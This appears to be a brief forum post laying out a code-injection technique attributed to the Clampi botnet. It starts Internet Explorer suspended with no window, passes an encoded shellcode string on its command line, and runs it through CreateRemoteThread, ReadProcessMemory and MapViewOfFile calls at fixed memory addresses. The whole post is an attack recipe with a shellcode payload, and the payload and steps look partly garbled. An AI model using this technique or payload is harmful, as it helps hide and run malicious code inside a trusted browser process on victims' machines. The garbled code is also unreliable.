Create a Internet Explorer process
in “Suspended Mode” with no visible window
Inject shellcode with the commandline:
Code:
C:\\Program Files\\Internet Explorer\\iexplore.exe \xFC\xEB\x1A^\x8B\xFEW\xAC<Zt\x0F,A\xC0\xE0\x04\x8A\xD8\xAC,A\x02\xC3\xAA\xEB\xECX\xC 3\xE8\xE1\xFF\xFF\xFFILOMOIAJAAAAAAJAJAJAJAJAJAJAJAJAFOAPDBLJAIAAAAAAILNAF GIKMCCEAPAEEBIIAGEGMBOKAEOCPCMGAGAAFOILHNAEIDMHBFDDMAFGFHFAGKAEFAG KPPLIFMJEIAHMPPNAILNIIFMAHFBALIDBADJBHMPPNADNLHAAAAAAHELJOLEODDMAFHFA FAGIBPAAAPAAFDLIAFLJIAHMPPNAIFMAHEDALJAJAAAAAAIJAEAIIJFMAIAEOIBEAAAAAAIL OMILHFAEILFOANPPHGAJLIHELJIAHMPPNAOLALIPEEAIAIILPIPMPDKEOLAKFDLIEHJLIAHMP PNADDMAILOFMDZ\0
Use the CreateRemoteThread API to create a remote thread
at memory location 0x7C812F1D …
This is is where the kernel function GetCommandLineA
has been mapped into Internet Explorer’s memory …
Return a pointer with the GetCommandLineA to the "shell" string
to pass as a parameter to the current process …
Use Api CreateRemoteThread at memory address 0x004A23DC ….
Call ReadProcessMemory ….
Use MapViewofFileExe on the object …
Once again call CreateRemoteThread to execute the injected code !
This method is used by the Clampi Botnet
Thx to the Researches …
Browse to em to get more infos !